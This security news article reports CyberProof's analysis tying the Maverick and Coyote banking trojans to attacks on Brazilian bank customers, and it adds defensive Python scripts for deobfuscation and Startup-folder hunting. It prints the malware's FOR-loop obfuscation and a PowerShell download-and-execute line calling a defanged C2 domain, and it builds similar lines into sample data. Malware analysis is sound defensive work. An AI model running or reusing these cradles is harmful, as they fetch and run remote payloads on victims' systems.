Researchers Uncover the Strong Links Between Maverick and Coyote Banking Malwares

Security researchers from CyberProof have discovered significant connections between two advanced banking trojans targeting Brazilian users and financial institutions.

The Maverick banking malware, identified through suspicious file downloads via WhatsApp, shares remarkable similarities with the earlier reported Coyote malware campaign.

Both threats employ sophisticated infection chains and demonstrate nearly identical behavioral patterns.

The discovery emerged when CyberProof security analysts identified incidents involving malicious file downloads through WhatsApp.

Investigation revealed that both threats are written in .NET and deploy a multi-stage infection chain that begins with a shortcut (LNK) file spawning PowerShell commands.

Both malware families target Brazilian banks, employ similar encryption to decrypt banking URLs, and demonstrate nearly identical monitoring routines.

The attack begins when victims receive ZIP files through WhatsApp containing malicious LNK shortcut files. Upon execution, these deploy heavily obfuscated PowerShell commands designed to evade detection.

CyberProof's researchers noted that the malware constructs its commands through chained FOR loops, splitting the executable name and parameters into fragments that are only concatenated at run time, in order to bypass command-line monitoring.

Malicious ZIP file downloaded from WhatsApp web (Source - CyberProof)

The infection chain demonstrates several evasion techniques. The malware combines Base64 and UTF-16LE encoding with string concatenation to reconstruct the PowerShell command only at run time. One analyzed sample showed the following obfuscation pattern:

for %y in (pow) do for %c in (er) do for %V in (shel) do for %q in (l.e) do for %A in (xe) do %y%c%V%q%A

Once the loop variables are expanded, the concatenation %y%c%V%q%A resolves to powershell.exe.
Variables and values assigned in the for loop (Source - CyberProof)

Once decoded, the PowerShell command contacts attacker-controlled domains to download the next stage of the infection.

powershell.exe -w hid -enc IEX (New-Object Net.WebClient).DownloadString('hxxps://zapgrande[.]com/api/itbi/BrDLwQ4tU70z')
Working of for loop of the script (Source - CyberProof)
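Both stages described above (the FOR-loop fragment concatenation and the Base64/UTF-16LE encoded command) can be undone statically without executing anything. The following analyst helper is an added example, not code from CyberProof or from the malware: it parses the FOR bindings, rebuilds the final command line, decodes the -enc argument, and pulls out URLs. The sample command line it runs against is constructed here from the fragments and the decoded cradle printed in the article; the variable names and fragment order are taken from the page, everything else is an assumption.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed input modelled on the article's description (pow/er/shel/l.e/xe
# fragments, then "-w hid -enc <base64 of UTF-16LE>"). It is not a real sample;
# the encoded part is built below from the article's decoded download cradle.
DECODED_CRADLE = (
    "IEX (New-Object Net.WebClient)."
    "DownloadString('hxxps://zapgrande[.]com/api/itbi/BrDLwQ4tU70z')"
)
ENCODED_CRADLE = base64.b64encode(DECODED_CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_LNK_CMD = (
    "for %y in (pow) do for %c in (er) do for %V in (shel) do "
    "for %q in (l.e) do for %A in (xe) do "
    "%y%c%V%q%A -w hid -enc " + ENCODED_CRADLE
)

# One cmd.exe FOR binding: "for %v in (fragment) do". On an LNK / cmd /c command
# line the variable is written %v (inside a .bat file it would be %%v).
FOR_BINDING_RE = re.compile(r"for\s+%(\w)\s+in\s+\(([^)]*)\)\s+do\s+", re.IGNORECASE)
# Any abbreviation of -EncodedCommand that powershell.exe accepts, then base64.
ENC_ARG_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# http(s) URLs, including the hxxp(s) defanged form used in reports.
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s'\"()]+", re.IGNORECASE)


def resolve_for_loop(cmd: str) -> str:
    """Collect every FOR variable binding and substitute it into the final command."""
    bindings: Dict[str, str] = {}
    tail_start = 0
    for m in FOR_BINDING_RE.finditer(cmd):
        bindings[m.group(1)] = m.group(2)  # FOR variables are case-sensitive: %V != %v
        tail_start = m.end()
    tail = cmd[tail_start:]  # whatever follows the last "do" is the real command
    # Replace only %v tokens that were bound; anything else stays as written.
    return re.sub(r"%(\w)", lambda m: bindings.get(m.group(1), m.group(0)), tail)


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Decode the -enc payload: Base64 wrapping a UTF-16LE string."""
    m = ENC_ARG_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a valid encoded command; treat as absent


def extract_urls(text: str) -> List[str]:
    return URL_RE.findall(text)


def analyze_lnk_command(cmd: str) -> Dict[str, object]:
    """Full pipeline: FOR-loop reconstruction -> -enc decoding -> URL extraction."""
    resolved = resolve_for_loop(cmd)
    decoded = decode_encoded_command(resolved)
    return {"resolved": resolved, "decoded": decoded, "urls": extract_urls(decoded or "")}


if __name__ == "__main__":
    for key, value in analyze_lnk_command(SAMPLE_LNK_CMD).items():
        print(f"{key}: {value}")
```

The resolver deliberately keys bindings on the exact variable letter, because cmd.exe FOR variables are case-sensitive and obfuscators rely on %V and %v being different; a case-insensitive substitution would silently produce the wrong executable name.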

Persistence and Detection Evasion

The malware establishes persistence by dropping a batch file in the Windows Startup folder, named HealthApp- followed by a GUID and the .bat extension (HealthApp-<GUID>.bat).

Run at each logon, the batch file makes outbound connections to command-and-control servers at domains such as sorvetenopote[.]com and zapgrande[.]com.
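The Startup-folder artifact is cheap to hunt for on an endpoint. The script below is an added example written for this article, not CyberProof's tooling: it matches the HealthApp-<GUID>.bat naming pattern, extracts every host the batch file contacts, and compares them with the two C2 domains named in the article. The directory listing it classifies is constructed inline; the real-filesystem walker at the bottom checks the per-user and all-users Startup folders. The exact GUID format (8-4-4-4-12 hex, braces optional) is an assumption, as is the batch-file content.

```python
import os
import re
from typing import Iterable, List, Optional, Tuple

# C2 domains named in the article, kept defanged as printed there.
KNOWN_C2_DOMAINS = {"sorvetenopote[.]com", "zapgrande[.]com"}

# HealthApp-<GUID>.bat; GUID as 8-4-4-4-12 hex groups, braces optional (assumption).
PERSIST_NAME_RE = re.compile(
    r"^HealthApp-\{?[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}\}?\.bat$", re.IGNORECASE
)
# Host part of any http/https (or defanged hxxp) URL inside the batch file.
URL_HOST_RE = re.compile(r"(?:https?|hxxps?)://([^/\s'\"]+)", re.IGNORECASE)

# Per-user and all-users Startup folders; both run their contents at logon.
STARTUP_DIRS = [
    os.path.join(os.environ.get("APPDATA", ""), "Microsoft", "Windows",
                 "Start Menu", "Programs", "Startup"),
    os.path.join(os.environ.get("PROGRAMDATA", ""), "Microsoft", "Windows",
                 "Start Menu", "Programs", "Startup"),
]


def refang(host: str) -> str:
    """Normalise defanged report notation so IOC lists compare equal to live data."""
    return host.lower().replace("[.]", ".")


def classify_startup_file(name: str, content: str) -> Optional[dict]:
    """Return a finding for a HealthApp-<GUID>.bat file, or None for anything else."""
    if not PERSIST_NAME_RE.match(name):
        return None
    hosts = sorted({refang(h) for h in URL_HOST_RE.findall(content)})
    known = {refang(d) for d in KNOWN_C2_DOMAINS}
    hits = [h for h in hosts if h in known or any(h.endswith("." + k) for k in known)]
    return {
        "file": name,
        "hosts": hosts,
        "known_c2": hits,
        "verdict": "known_c2" if hits else "suspicious_name",
    }


def hunt(entries: Iterable[Tuple[str, str]]) -> List[dict]:
    """Classify (filename, content) pairs; keeps only files matching the pattern."""
    findings = []
    for name, content in entries:
        finding = classify_startup_file(name, content)
        if finding:
            findings.append(finding)
    return findings


def hunt_startup_folders(dirs: Iterable[str] = STARTUP_DIRS) -> List[dict]:
    """Read every .bat in the Startup folders and run the classifier over them."""
    entries = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for entry in os.scandir(d):
            if entry.is_file() and entry.name.lower().endswith(".bat"):
                with open(entry.path, "r", encoding="utf-8", errors="replace") as fh:
                    entries.append((entry.name, fh.read()))
    return hunt(entries)


# Constructed Startup listing (not real files): one Maverick-style dropper, one
# same-pattern file pointing elsewhere, one decoy that fails the name check.
SAMPLE_STARTUP = [
    ("HealthApp-3f2504e0-4f89-11d3-9a0c-0305e82c3301.bat",
     "@echo off\r\npowershell -w hid -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('hxxps://sorvetenopote[.]com/api/stage2')\"\r\n"),
    ("HealthApp-7c9e6679-7425-40de-944b-e07fc1f90ae7.bat",
     "powershell -w hid -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('https://updates.example/x')\"\r\n"),
    ("HealthApp-notaguid.bat", "echo benign\r\n"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_STARTUP) + hunt_startup_folders():
        print(finding)
```

A name match alone is reported as suspicious rather than ignored: the domains in an article age quickly, while the dropper's naming convention is the part a rebuilt campaign is least likely to change.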

The Maverick agent performs extensive victim profiling before executing banking theft functionality.

It checks Brazilian timezone settings, locale configurations, regional settings, and date formats. The malware terminates itself if criteria are not met, ensuring operation within intended geography.

Both Maverick and Coyote decrypt their stored banking URLs from Base64 strings using AES in CBC mode combined with GZIP compression.

This encryption similarity, combined with nearly identical banking monitoring code, strongly suggests shared development origins. The malware monitors browsers including Chrome, Firefox, Edge, Opera, and Brave for connections to over 50 Brazilian financial institutions.
